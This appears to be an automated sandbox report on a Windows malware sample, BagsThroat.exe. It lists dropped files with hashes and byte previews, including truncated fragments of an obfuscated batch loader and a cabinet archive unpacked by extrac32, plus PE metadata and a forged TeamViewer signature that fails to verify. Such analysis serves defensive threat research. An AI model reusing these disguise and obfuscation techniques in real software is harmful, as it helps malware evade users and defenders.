                                      Preview:.`.......#9.A.d.6..e..2.>..P9.)m.4...OQ.~.I..a.H..r..}'......%.[\.5c;I(%..Of.vz...b7.......gp.&..>.&..L .S%K9}6.OY..^..x:..B..y.`zw..*.@..U....W..Ai.......Bt...a.8X..%.|..n.a.%..n.'v.-z......$b7-.Yw... .,h\.=...7~p..&8..z@g.d.H.^5....".e.!].h>..aH..si.(.......!...R..hN&.....S.....r.J.k...{..,D.3....ZYx...Gj.....xsr5...7.....:...;..k.!._...-..fT.....MQe.(gB.xP.\ ....$d.I.!.&.....`.%.%....y0..._....0d..r'...~;7I....>.".V.C........eG.U:@G......2.0.j....2n..K.c.Hq(.....Xz.7.I..b........Y.UR .~)....5.u...Z..D....2....rG.;Z..he!......W..w...Y..gR.\..Lhk.>..-pi......J.va.)..:A..E...g..K&...-...$.^H....vw~o...[p.-2.."~.'%r...k....Z.^.U...So#....,......[.@a.Xg.J.W...n...\)....^{R..3....>.;..K.m5/X...H.U.9Q...oC..erQ........j.AS[.y....'5..a|F.D..:.E.g.......g..:..R......,..3.I...H..M|...6;!..%.l5A\.!j.\.....%.#vUQ<K>.i...m.2 /5GH.....W..yxDa9..5.H.7.(..4.'....#y}.+..;....g.#."F....f7l.....@..E..gTY..(.......)s.H.f..n...<....Q*...$V<.Z....
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):15022
                                      Entropy (8bit):7.9870833060716615
                                      Encrypted:false
                                      SSDEEP:384:Xohr0DChCBOtbstzLR2Ztk71pls/F4Cm8gjNVPp:XsYehOwsVV8tkhE/F4CsX
                                      MD5:5EDF8B76F5259F18AC5B48A9BE7D5A9C
                                      SHA1:9FA0B847524EC85B1F3B9568E755E175A0204E34
                                      SHA-256:B27080EEDFAC5BF6EC956EFAC77A20BC52C95B9FB95AE5F0E29349C260523B35
                                      SHA-512:235F1ABEBC2DE5B73D6CC8B6EFAE008E2362C8EECF565862070502DF253F1460863219AEBADEF74BD84387ED618820A49E76B0C691C58EBD59FA1A358C7112E1
                                      Malicious:false
                                      Preview:.n.ZD....2,?^....r=.+.)...3.......3.ld. .Fm...G.....l..N.G.3[.<9.....H. R..q`....\.'H]..?.p.'..O4.....'._{).8=6...`../}.fG..N...'.s......u...ysk.r....*..h4~..P....h....o......f.U0...>.j.'.8FS........I..f;..%...d....s.....7.(.$l$.I...O2.i.&....*X(.VQ.o+...1.m.z.l..I.^l......Se.4..u....M....."......T.=...;;..Z..............F...a[qJW.6..a...[.{.=.u......#..:.`...|l.7...(.....{KR@..._..s.'.3\.Np.6wS.....%..1._M...e5.q.....r.yW]|...W)............IfP..;..s..H..?...w..~h.\..q...aAb.7pN.E.'...0:}..m.k..o8.;z...E.&........D..e..........3....</-..{=.......u.U...VaI.8.=..+..n!]~m.='t..r...u..bm..b...r.I.Hf..H.jw...w..Y.D...d..r&........m.C.L...V...l<.f..._...E.T/.M>.1.....*.%..U....4^.o|.....W.....$ v.....K./..>*._/%.0D..yW...q.V..Q.....e.{..$.-E.?.k...x.].....Q.......S.N.?i..J.xs.m`.ul...>rs....-8....G1OU.../QC.J:.Re....H...u.1....^...%.....0..Te.JQ<.N.V.d.)..(....,..TX.nY/.N......Y.M....fV..T+W..Oc.F./:..:.X=...W...p..P?...M..Ag....../0...D>&..,.
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:Microsoft Cabinet archive data, 487716 bytes, 11 files, at 0x2c +A "Button" +A "Pledge", ID 6344, number 1, 29 datablocks, 0x1 compression
                                      Category:dropped
                                      Size (bytes):487716
                                      Entropy (8bit):7.998707506288359
                                      Encrypted:true
                                      SSDEEP:12288:YOlgWJ8WJAxkstcqtqoD9a6EAxHEG1RMEfggIr5BrZhG:YOlgWJ9AnlqoD9NSQythG
                                      MD5:83AEC38FA4C64D2200448897B0627859
                                      SHA1:10585CDB45E5EA30FFDDF0368047D46768C107C4
                                      SHA-256:F618451D85B98F254DF7F0DEB79E21EBFD30EBD9F53A018BE3AD2BA61738C889
                                      SHA-512:6AF38129C71DEF5BE13E1778A30C2EA1706A6F475551AE99D53ED43C9B21D2CFCFCCEAE6605B8075AB13EAFC52F9632F15F79283F947210FB122448976E6A20F
                                      Malicious:false
                                      Preview:MSCF....$q......,...................&..................Y.\ .Button..p.........Y.\ .Pledge.....x.....Y.\ .Tim......5.....Y.\ .Speeches......A.....Y.\ .Managers.s....E.....Y.\ .Eat..4..`H.....Y.\ .Ve.....`|.....Y.\ .Michael..(..`p.....Y.\ .Barely.....`......Y.\ .Boolean.....`......Y.\ .Heights.y..S..CK..T..8|7{......`.Q...mdA..4..&(..!.DH..i\.S.]........~...U1.b..R.....$(..T#..+.......`...s.&.>}........s...3.......$.J...<G.....V......A.N..Nx...|.7..... ..aH..'I5..0............_^$.W.......%..k..Z.Wc.[..U_....L....v1.S-&...b1.RHy.S.Q.,[.T.s.D...l......F...B.s...H..%4...j....!.1a..p...c.&,..=3f....=d..NJ-.ZoZ...k..]..W$.1s.s..Q...9..S0g.68J.p.,i.I....2/L.?o.$..&.R.O()....P..b.%A..x.E.Q.....I......AS<I.WPR.......k%I.(|.....@L...>=...~.X?A.B.5.r.,.N..@........G*..K..W$...{..SL.F*.@..>..G.C./.u..?.$...Ae/@e.6..j.d....*....../.R[....d.+Y..*,l..U...4V..*lb..$....Ud...hu.jb..XE.s.g.7s-b......1.r...}...Ah..m.0.w...Y[.....n.(..#....6..5.Nk[6C.n.h[.my.xD..6....
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):627
                                      Entropy (8bit):4.281494712266738
                                      Encrypted:false
                                      SSDEEP:12:D2+8yGSG+fCtJfjEvadTfA43k66h1ICdC3v6cl/:Dh8yGS9PvCA433C+sCN/
                                      MD5:5F4A17BEC8C80C80333C6A4A319E6690
                                      SHA1:23D9E2E0F30329A75A6AE74761BA07DD77F307E8
                                      SHA-256:B9F971DB06DA104D3BA7C18E733B7D50DA01C2A91BFCCB5F6433BE6B7321E933
                                      SHA-512:A22F4BDD193C9C62CE6BE0E14DE18F8EE12BCA0BC65AE5583227ABD92E400C1A464176127815267519F0552344AFD9A65B399E1906A8CDFAA4668A91AF2CABAD
                                      Malicious:false
                                      Preview:Detailed........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):60416
                                      Entropy (8bit):5.097525223660272
                                      Encrypted:false
                                      SSDEEP:768:3OWel3EYr8qcDP8WBosd0bHazf0Tye4Ur2P:35el3EYrDWyu0uZo2P
                                      MD5:9654140FA4C77C63096B201416F1B6A0
                                      SHA1:E26932966D4096D1C3DB68C17BA5ABE7AE6E6F27
                                      SHA-256:119DDE8D8A2A90FC2C5633C9CAAB0E1230B07CE8C73F24AE5C0D47EE2467AEE2
                                      SHA-512:4E09EE3E14CE914C73B9DD391B0DDE5F2E48066C8633B0B98CF76217DE4F3BA54D40088D919D89E202B121EA9ACB208ADB6AB702A1771B96FC89DFB70C7C7939
                                      Malicious:false
                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:DOS executable (COM)
                                      Category:dropped
                                      Size (bytes):132096
                                      Entropy (8bit):6.599505380219873
                                      Encrypted:false
                                      SSDEEP:3072:mhVOoQ7t8T6pUkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOo:p6AUkB0CThp6vmVnjphfhnM
                                      MD5:77A100D004A446BBBEC4DDC74721973A
                                      SHA1:13A1C66DE03F68D2B0FD59976B249921BA928A69
                                      SHA-256:48866DA93E4A8A20F0CAF75D87820A9E3975736CB52DFF724FCFB9C7F1CB6B7A
                                      SHA-512:276D2047450B656CD5970A0B4E21FBAC515EA12FF0D51A0C1D7B28F07024A699555C781EA74E3EBB6CE36F6B95FB88390F95DD73AE0C167EAD868532EEA0F4F5
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:.!.u.."........E..p...V.0.!...;...._^..[....U.....E.SVW.p..8..V.M...*..YP.M...k...].3..t...+.G...9......D.....;.r.M.VS......M.;.....E..).u.j.Q.;*..S.|*...E...._^[....U..V..f...F......LH..j..I*..Y.M.......^]...U....SV..M.W.^.S.}...3...t1W.......f.8.u.j..M......W........M....P....G;.r.E.;.t.P...;....M......_^[..U..4.....K..SV........P......*..............P.......YY......P......P..(.I...u;8E.tZ......P......P.}..YY..............P......P.. .I.............p.....t........a.....t..}..u?2.^[.......P.M......M........M.............u.............t.......h.xL.P...........P..t..3.f..E..........P..t..3..E........f..E...........E......E.3..E.E..E.E.....f.E.E.P....I.....?......:...U.......SV..3.W.M.]....5....M..-....M..%....U....~...U.....~...U..M.......M.E..8.....xL...t.V.M......M........t.V.M......M.......M......S.E.SP.U..M...|.......8...P.u.....I.....E......+....=..I.<.........8............d...P.M.......E.P.U..M..T...Y.M..s....E..M.E.E..E..E.E.E.E....E.P.j.....d...P.
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):128000
                                      Entropy (8bit):6.657700906171978
                                      Encrypted:false
                                      SSDEEP:3072:H4CE0Imbi80PtCZEMnVIPPBxT/sZydTmRxlHS3NxrHR:YClbfSCOMVIPPL/sZ7HS3zt
                                      MD5:42C917242AE3AE7A388678F5C63ADADE
                                      SHA1:6613748AD771CACAE32BC8FAF98898EC1D943602
                                      SHA-256:CDCADA29E45A10FA53C557BB96613A119EB893648B24B4C243027DAFD637DCD2
                                      SHA-512:3989C2E516EFFD9D18F71E6FFC5B62778AE31C37EBFA0AA23A4792505158D8D6D1EA93D5AB82B3E9477546F03FEC6B600F4B9F49082BE452BC520004866E8BDE
                                      Malicious:false
                                      Preview:d"M.Pf9.\"M.u....`"M.SP...b"M.P...^"M.P.v.W.....b"M.P...^"M.SSP.v.SW.......,.Oj.Xj.Z3.j.C_..k}.j.Xj._3.j.B[j.j.j.j.j.j.RPQj.j.....3.PPPj.PPSW.v.j.j..}.....X....L..=..L..N.;.}.;.|&;..";.~";.}.3.@_^[..].;.|.;...;.~.;.}.3...kF.<.F.k.<..i.....3.;.u.;5..L......;5..L.....SSSSS..o....U..QQ.e...}..VW.}.uySW.I...].....E.Y..t.....J.....l.J.WF....Yi.m.....j...6......Y...M.k..+.;U.......E....}..t.....J.....p.J.[...u*;.~&....!W..I.....E.Yt..4...J....4.l.J..u kE$<.E(k.<.E,i......E0.}..u..5..L....L..=..L._^..]...L..E.P.5..L.....Y..uDiE.........L......L.y....\&.....L.....\&.;.|.+.....L.....L..=..L..j.j.j.j.j..n....U....SV......e....e...E.P.]..B...Y.........E.P.....Y..........."M..u...t4....:.u...t..X.:Y.u.........u.3............D....].R..o..Y..Q...A..u.+.A.P."~..j..."M..o....."M.YY..........W.y...A..u.+.V.A.PR.n.............j._WVj@.3.................>.t.F...u..>-_....t.FV...Yi......M...<+t.<0|.<9..F..>:uBFV...k.<Y.M...M...<9..F..<0}..>:u.FV.a...Y.M...M...<9..F..<0}...t...M.
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):84992
                                      Entropy (8bit):7.998170672421689
                                      Encrypted:true
                                      SSDEEP:1536:/V/BDE7gSBN9z33cRA87hNwvOTO41OAClKfCArXtH2r:/V1E8SBncNhWgDyalU
                                      MD5:DAB5EB163EC9C442B8A3EF70CDA26541
                                      SHA1:401436FF0C3B3E635FDE5F4830E6769ADC5E487E
                                      SHA-256:D831091383DA89B8572C3B1846C69004415A0669581897551F65B40BBAAD8C1E
                                      SHA-512:31E4C2C9003F925523EDD4C95EF7E6198954AE899B6464FF82280F4CD7993A1C223073253972D90243CA1335E4E6E6DC02EA8E9B17A7A3D82DC28B3A28CFF3E3
                                      Malicious:false
                                       Preview:
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):59392
                                      Entropy (8bit):7.997100423038379
                                      Encrypted:true
                                      SSDEEP:1536:6E9aDkoEzjten+vPfTECrWiFwes9SY5En6Md4:6UtFLJCS7gf5O4
                                      MD5:9EEBCFD7BA6BA817EE8B455814E9DEC9
                                      SHA1:0A043727E47F66D6B163A826828C77AFB96284FA
                                      SHA-256:8A605DE35B83BE5823D1A971D126F0E3B1B4B768BB6F57D883D498F293EDA272
                                      SHA-512:0B6ADA25CCDFEA37130E220B9A9C02AB49E077F35FA4442CC16B8AED6D65007B4AD0AF28F4A520511B1098872BAB477DA24E63564E6B6CCE791BBE50193E971C
                                      Malicious:false
                                       Preview:
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):94208
                                      Entropy (8bit):6.334063566470479
                                      Encrypted:false
                                      SSDEEP:1536:5dlDfFgQa8BpDzdZPp7HE+tKA3QkvyNf7Xw2U0pkzUWBh2zGc/xv5mjKu2IwNnPh:BdgQa8Bp/LxyA3laW2UDQWf05mjccBiX
                                      MD5:7495F417AB14F339A275C91E4AE3B32D
                                      SHA1:EF2B55D2044BC272B2162B6476AA8CF34E7D6372
                                      SHA-256:F675F15DF6F29F8DEE34C8C9581C88F87DB72606C78DDCB17DCF658158C47E79
                                      SHA-512:EB96B6D8C5D752E4D8C8D076D795E3FC0F385B60D22F1D8AE1142F728C790E2BEB13C59DC2C0D941C1F2E6DA56BC6DFD0BD609EC71A0E13D9AFA9785C16AE476
                                      Malicious:false
                                       Preview:
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):99328
                                      Entropy (8bit):7.998121313681826
                                      Encrypted:true
                                      SSDEEP:3072:RZ2w0kQ1ORookGPUSSDQko2hgyQzOxLx+gfe:RtEMVkGPU/QkhlxLsgfe
                                      MD5:6244CF9E0B1F9729B1C027B6B26F6010
                                      SHA1:133A9E92565C0C9CB00D9F942DF95E43BDFC1911
                                      SHA-256:FC30514EB57F4693E5D719075AC7AD673C74E55612ED9F4597AF9E31B85F01D1
                                      SHA-512:ED1E1C228C8F2E847FAE2BCAE998501D249E856A60068188DFF69E6A6DC123BB129F67580C502EBF2C09A9EB0CB093773BE61BF66DA3AFEE184650149523E076
                                      Malicious:false
                                       Preview:
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):134144
                                      Entropy (8bit):5.353600638693791
                                      Encrypted:false
                                      SSDEEP:768:2U7aI4kCD9vmPukxhSaAwuXc/mex/SGKAGWRqA60dTcR4qYnGfAHE9AUsFxyLtV+:himuzaAwusPdKaj6iTcPAsAhxjgarB
                                      MD5:89FA596A7CD363C2C2F82CE727082FAD
                                      SHA1:C789493A3D4106A038270A050A40B4E27A15A1DB
                                      SHA-256:BE4A5C0BAECD0DA597E797A87A98A8E58D8DCDF1B65CDC593932645CC0FA2706
                                      SHA-512:1F17A8BCE01308C80234E03AC89B31538E8FAA688D29797EFA8757DC25992EB3CB83699B029CF4C062C21899C709DE54BF965DDCB9F11DF0377E52825AA22FE0
                                      Malicious:false
                                       Preview:
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:ASCII text, with very long lines (1055), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):24638
                                      Entropy (8bit):5.1033772566503774
                                      Encrypted:false
                                      SSDEEP:768:i0Qhr+8ApRCzth0szdtSSg3YpG81Mk576kow:i5hrSUth0szdiy1Mk576kow
                                      MD5:9FE8970AD0AAD8E6887EC92CB186112A
                                      SHA1:4A440BAA4D53611E675B1D7F917CAEEE81CE3E33
                                      SHA-256:F259A1C6D1E9D0E2C7B68CABD9080B0F42A0F95B2043DD52346EDA6A6DF9816C
                                      SHA-512:7C1FC3D142E9DBD0CD6E2B1862EA6847A82AD18E91284FD9C9A2B1DD4193FAB0929F7BF9982EF8D63745C759E803C518D1305D61B700BBFE6E15FB946AFAD3EE
                                      Malicious:false
                                      Preview:Set Harley=T..NeOQLime-Antarctica-..MSRIntel-Bermuda-Commissioners-Rg-Follows-..eQylCondition-Easy-Slight-..dcSpeaks-Money-Title-..gZStands-Receivers-..eEnBRealtors-Albert-..uQPolar-..Set Shaw=X..iVgcKansas-..tbknBowling-Sisters-Lectures-Buyer-Under-Prefix-Filename-Muslim-Viking-..HYvOut-..eUNRear-..yqyComplex-Tba-Blah-Innovations-Milfs-..QEetTechrepublic-Creating-Animal-Paris-Painting-Undergraduate-Occasions-Drives-Evaluate-..Set Throat=U..wAILatvia-Presentations-Finals-Latina-Pay-Yes-Nicole-Strict-Pirates-..ibaExt-Course-Likes-Nathan-..ZdYu-Tour-Snow-..QYecEssence-Promising-Returning-Triumph-Potato-Deadly-Monte-..ChNCreations-Drug-Secretariat-Omega-Bermuda-Atlantic-Considerable-Zambia-Includes-..JGhHygiene-Poll-Wi-Complexity-Output-Significance-Described-..RMEnWing-Updating-Bald-Overhead-Relative-Mike-..Set Beat=8..MiauApplicants-Yorkshire-Upskirt-Rays-Alone-Terrorists-Substantially-Birmingham-Diary-..ObtOBaghdad-Llp-Silk-Stations-Bon-Mac-Ruled-..pHcQLimiting-Permits-..FSMariah-Subli
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:ASCII text, with very long lines (1055), with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):24638
                                      Entropy (8bit):5.1033772566503774
                                      Encrypted:false
                                      SSDEEP:768:i0Qhr+8ApRCzth0szdtSSg3YpG81Mk576kow:i5hrSUth0szdiy1Mk576kow
                                      MD5:9FE8970AD0AAD8E6887EC92CB186112A
                                      SHA1:4A440BAA4D53611E675B1D7F917CAEEE81CE3E33
                                      SHA-256:F259A1C6D1E9D0E2C7B68CABD9080B0F42A0F95B2043DD52346EDA6A6DF9816C
                                      SHA-512:7C1FC3D142E9DBD0CD6E2B1862EA6847A82AD18E91284FD9C9A2B1DD4193FAB0929F7BF9982EF8D63745C759E803C518D1305D61B700BBFE6E15FB946AFAD3EE
                                      Malicious:false
                                      Preview:Set Harley=T..NeOQLime-Antarctica-..MSRIntel-Bermuda-Commissioners-Rg-Follows-..eQylCondition-Easy-Slight-..dcSpeaks-Money-Title-..gZStands-Receivers-..eEnBRealtors-Albert-..uQPolar-..Set Shaw=X..iVgcKansas-..tbknBowling-Sisters-Lectures-Buyer-Under-Prefix-Filename-Muslim-Viking-..HYvOut-..eUNRear-..yqyComplex-Tba-Blah-Innovations-Milfs-..QEetTechrepublic-Creating-Animal-Paris-Painting-Undergraduate-Occasions-Drives-Evaluate-..Set Throat=U..wAILatvia-Presentations-Finals-Latina-Pay-Yes-Nicole-Strict-Pirates-..ibaExt-Course-Likes-Nathan-..ZdYu-Tour-Snow-..QYecEssence-Promising-Returning-Triumph-Potato-Deadly-Monte-..ChNCreations-Drug-Secretariat-Omega-Bermuda-Atlantic-Considerable-Zambia-Includes-..JGhHygiene-Poll-Wi-Complexity-Output-Significance-Described-..RMEnWing-Updating-Bald-Overhead-Relative-Mike-..Set Beat=8..MiauApplicants-Yorkshire-Upskirt-Rays-Alone-Terrorists-Substantially-Birmingham-Diary-..ObtOBaghdad-Llp-Silk-Stations-Bon-Mac-Ruled-..pHcQLimiting-Permits-..FSMariah-Subli
                                      Process:C:\Users\user\Desktop\BagsThroat.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):60416
                                      Entropy (8bit):7.997114737997307
                                      Encrypted:true
                                      SSDEEP:768:600vcxnlAKkulAtgFr/RZDY8NuLAK1hhDbn5vlAJf7kiqVxGuTF/Gjp9DbwLJ8:6ZvcTblAtCnDR8EKT6l+/bB/atbw8
                                      MD5:9B0C2C035ACAEB06132AB40F45EEA335
                                      SHA1:B103F8FC5D703990E588D21A798BF6572B841B64
                                      SHA-256:335153E166D777C3CF61F3B52EA12D26C2EACDB22307CD0A72321844D959FB96
                                      SHA-512:F655E4EABAC5354F73B59E445DF22DC8078C9110AA2443CF85441EB38DAF7F9999FF7CD9FADC9E946CAD5362948DDC9D3990726E270C59066BB7A7924DC0F897
                                      Malicious:false
                                       Preview:
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):48621
                                      Entropy (8bit):7.036578405079938
                                      Encrypted:false
                                      SSDEEP:768:W9BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:W9BGmdATGODv7xvTphAiPChgZ2kOE6
                                      MD5:2587810530100D2C69B7FD1FFB61A892
                                      SHA1:FA5AD55CE6DED5648F6EDB6AA18ECB2927908927
                                      SHA-256:76C61344973C451508B682AC19423A5C82D2A31A0807969C439FA7C739608E4A
                                      SHA-512:B90585691C8DEAD0C65B2CE2DC993CDFD5FC27E1E3EFCF58FBB306FE3E4DBBC73B166CD607038EB213710AFE2C1ABA9C3D2DAC86F0F8F9A115820956DA4A5C7E
                                      Malicious:false
                                       Preview:
                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                      File Type:data
                                      Category:dropped
                                      Size (bytes):78848
                                      Entropy (8bit):6.677457463606737
                                      Encrypted:false
                                      SSDEEP:1536:c/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+I+FrbCyIL:cgF4qv+32eOyKODOSpQSAM
                                      MD5:6FFCF91F67AA7CB557BD6C15179997C2
                                      SHA1:004E56785762CCD06A3301832B2DEFE529195E60
                                      SHA-256:B4E8423BE7458A19EC3A50A5EA1029359766CA702F9A1C391E2DD00F14677516
                                      SHA-512:071AB42A94563CE04EC7D90FC103CC83658D0018B4DB74D119CEBF3A0375271E74425065B4A4B3FFE914C94C8342EFC0165988E8AF484883B693F4D647906344
                                      Malicious:false
                                       Preview:
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.965679971225888
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:BagsThroat.exe
                                      File size:1'112'940 bytes
                                      MD5:3b819d687b2bde89ade8eb1aeb4c6c5f
                                      SHA1:e77057a1143c44eaf281e5f1a65ddc19c0a7cb98
                                      SHA256:0158aa426fceb64ed638b0abddbb6e26dc0806938ad34246db7ff0088668a7ee
                                      SHA512:bd2d6f16863a3b18383ddfe255a74d7982ecef145c8235238a7ac54f75291a095b0f3bd8e876413ee8d18e2b8c31d95c86fd8291e5b7c8381e038fd900e45412
                                      SSDEEP:24576:yRUORgU9hMlqoD9peQJsAS7TPK7DG2bJ27ETvj/4tW/:OUO2U0qsrDsAq7Vec7ETDOW/
                                      TLSH:2C353342DEA4DC2AE9940D3224F99A219E3C3F216D77D65F0314CACF6D72781AD44BE2
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t...8...B...8.....
                                      Icon Hash:2970d080e070b248
                                      Entrypoint:0x4038af
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:0
                                      File Version Major:5
                                      File Version Minor:0
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:0
                                      Import Hash:be41bf7b8cc010b614bd36bbca606973
                                      Signature Valid:false
                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                      Signature Validation Error:The digital signature of the object did not verify
                                      Error Number:-2146869232
                                      Not Before, Not After
                                      • 04/05/2023 02:00:00 07/05/2026 01:59:59
                                      Subject Chain
                                       • CN=TeamViewer Germany GmbH, O=TeamViewer Germany GmbH, L=Göppingen, S=Baden-Württemberg, C=DE
                                      Version:3
                                      Thumbprint MD5:0D637B42FF0AB3019673C4243305BD25
                                      Thumbprint SHA-1:777A41024CF413CCB49B3434565545C0D78D80E9
                                      Thumbprint SHA-256:3A0A9BD3CBF08E350DACBFCB54C53F00113D929DAD01AF4C9D5BFE37ACF9F352
                                      Serial:062EE3FD7CDC52097C1DA6AFA87C745E
                                      Instruction
                                      sub esp, 000002D4h
                                      push ebx
                                      push ebp
                                      push esi
                                      push edi
                                      push 00000020h
                                      xor ebp, ebp
                                      pop esi
                                      mov dword ptr [esp+18h], ebp
                                      mov dword ptr [esp+10h], 0040A268h
                                      mov dword ptr [esp+14h], ebp
                                      call dword ptr [00409030h]
                                      push 00008001h
                                      call dword ptr [004090B4h]
                                      push ebp
                                      call dword ptr [004092C0h]
                                      push 00000008h
                                      mov dword ptr [0047EB98h], eax
                                      call 00007F0280C5E39Bh
                                      push ebp
                                      push 000002B4h
                                      mov dword ptr [0047EAB0h], eax
                                      lea eax, dword ptr [esp+38h]
                                      push eax
                                      push ebp
                                      push 0040A264h
                                      call dword ptr [00409184h]
                                      push 0040A24Ch
                                      push 00476AA0h
                                      call 00007F0280C5E07Dh
                                      call dword ptr [004090B0h]
                                      push eax
                                      mov edi, 004CF0A0h
                                      push edi
                                      call 00007F0280C5E06Bh
                                      push ebp
                                      call dword ptr [00409134h]
                                      cmp word ptr [004CF0A0h], 0022h
                                      mov dword ptr [0047EAB8h], eax
                                      mov eax, edi
                                      jne 00007F0280C5B96Ah
                                      push 00000022h
                                      pop esi
                                      mov eax, 004CF0A2h
                                      push esi
                                      push eax
                                      call 00007F0280C5DD41h
                                      push eax
                                      call dword ptr [00409260h]
                                      mov esi, eax
                                      mov dword ptr [esp+1Ch], esi
                                      jmp 00007F0280C5B9F3h
                                      push 00000020h
                                      pop ebx
                                      cmp ax, bx
                                      jne 00007F0280C5B96Ah
                                      add esi, 02h
                                      cmp word ptr [esi], bx
                                      Programming Language:
                                      • [ C ] VS2008 SP1 build 30729
                                      • [IMP] VS2008 SP1 build 30729
                                      • [ C ] VS2010 SP1 build 40219
                                      • [RES] VS2010 SP1 build 40219
                                      • [LNK] VS2010 SP1 build 40219
                                       Name | Virtual Address | Virtual Size | Is in Section
                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0xac40 | 0xb4 | .rdata
                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x100000 | 0xca6e | .rsrc
                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x10cc3c | 0x2f30 |
                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x86000 | 0x994 | .ndata
                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x9000 | 0x2d0 | .rdata
                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                       Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                       .text | 0x1000 | 0x728c | 0x7400 | 419d4e1be1ac35a5db9c47f553b27cea | False | 0.6566540948275862 | data | 6.499708590628113 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                       .rdata | 0x9000 | 0x2b6e | 0x2c00 | cca1ca3fbf99570f6de9b43ce767f368 | False | 0.3678977272727273 | data | 4.497932535153822 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       .data | 0xc000 | 0x72b9c | 0x200 | 77f0839f8ebea31040e462523e1c770e | False | 0.279296875 | data | 1.8049406284608531 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                       .ndata | 0x7f000 | 0x81000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
